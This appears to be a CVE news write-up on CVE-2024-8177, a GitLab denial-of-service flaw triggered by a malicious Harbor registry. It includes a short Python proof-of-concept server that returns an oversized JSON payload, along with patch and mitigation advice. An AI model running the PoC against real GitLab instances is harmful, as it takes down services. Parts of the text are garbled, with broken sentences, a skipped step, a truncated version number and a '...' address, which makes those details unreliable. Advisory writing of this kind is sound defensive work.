CVE CyberSecurity Database News

CVE-2024-8177 - Denial of Service in GitLab via Malicious Harbor Registry Integration

Poster -

_Discovered in early 2024, CVE-2024-8177 is a significant Denial of Service (DoS) vulnerability affecting a wide range of GitLab Community Edition (CE) and Enterprise Edition (EE) versions. This long read will break down what the vulnerability is, how it works, its impact, and how to protect yourself or your organization. We'll use clear language and code snippets to make this technical issue easy to understand._

What is CVE-2024-8177?

CVE-2024-8177 is a vulnerability that allows an attacker to crash or hang a GitLab server simply by integrating it with a specially crafted, malicious Harbor registry. Harbor is a popular open-source container image registry that many organizations use with GitLab's container registry features.

How Does It Work?

When you connect a Harbor registry to GitLab, GitLab tries to sync project information from the registry, fetching details and registry metadata. The vulnerability lies in how GitLab fetches and parses this data.

A malicious third-party Harbor registry can be set up that, when GitLab connects to it (for instance, importing a project or accessing registry data), sends back a payload or response that causes GitLab to hang or crash due to unanticipated input. This is a classic Denial of Service scenario.

Where’s the Problem? (Simplified Explanation)

It happens in code handling the registry endpoint responses. When GitLab fetches information from Harbor, it expects responses in a certain format. If a response is corrupt, malformed, or intentionally crafted to overwhelm GitLab’s parsing logic, GitLab’s process may become unresponsive or even crash.

Exploit Scenario: How Someone Could Abuse This

> Note: The following is for educational purposes only. Do not attempt unauthorized attacks.

Imagine you run a GitLab server at your company. You want to integrate a Harbor registry—maybe hosted by a partner company or on a public server.

An attacker sets up a malicious Harbor registry that you connect to via GitLab’s container registry integration. As soon as GitLab tries to synchronize, the malicious registry sends a gigantic or malformed JSON response, like a payload with millions of nested objects or malformed headers.

The GitLab web UI to hang.

- Server CPU/RAM to spike, impacting others on the same server.

You can see GitLab’s official security advisory here

- GitLab Security Release: GitLab 17.6.1, 17.5.3, and 17.4.5 released

Note: Mitre’s official CVE record is here (at the time of writing this, this page might still be updating as the CVE is new).

Proof of Concept (PoC): Malicious Harbor Registry

You can reproduce the problem using a fake Harbor HTTP server. Here’s a minimal example using Python’s http.server:

from http.server import BaseHTTPRequestHandler, HTTPServer

class MaliciousHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()
        # Send a huge payload (overwhelm GitLab)
        huge_payload = '{"repos":[' + ','.join(['{}']*100000) + ']}'
        self.wfile.write(huge_payload.encode())

if __name__ == "__main__":
    server = HTTPServer(('...', 500), MaliciousHandler)
    print("Malicious Harbor registry listening on port 500")
    server.serve_forever()

In GitLab, add a new registry integration, pointing to the address of your malicious Harbor server.

3. On connection, GitLab tries to fetch repo info — and may crash or hang, depending on your system’s resources and the version.

Warning: Never run this code against real production systems you do not own or have permission to test.

How To Fix (Mitigation & Patch)

Upgrade GitLab:

17.6.1 or later

It’s crucial to upgrade as soon as possible if you use container registry integrations.

Mitigation:
If you cannot upgrade, immediately DISABLE Harbor registry integration, or restrict network access so GitLab can only talk to trusted registry servers.

Conclusion: Key Takeaways

- CVE-2024-8177 is a critical Denial of Service in GitLab’s registry integration feature, triggered by a malicious Harbor registry response.
- Affects GitLab CE/EE 15.6+ up to 17.4.4, 17.5.2, and 17.6..

Only add trusted Harbor registries.

- More info: GitLab release notes

Further Reading

- GitLab Container Registry Docs
- GitHub issue tracker (search for updates)
- Harbor Project

Timeline

Published on: 11/26/2024 19:15:31 UTC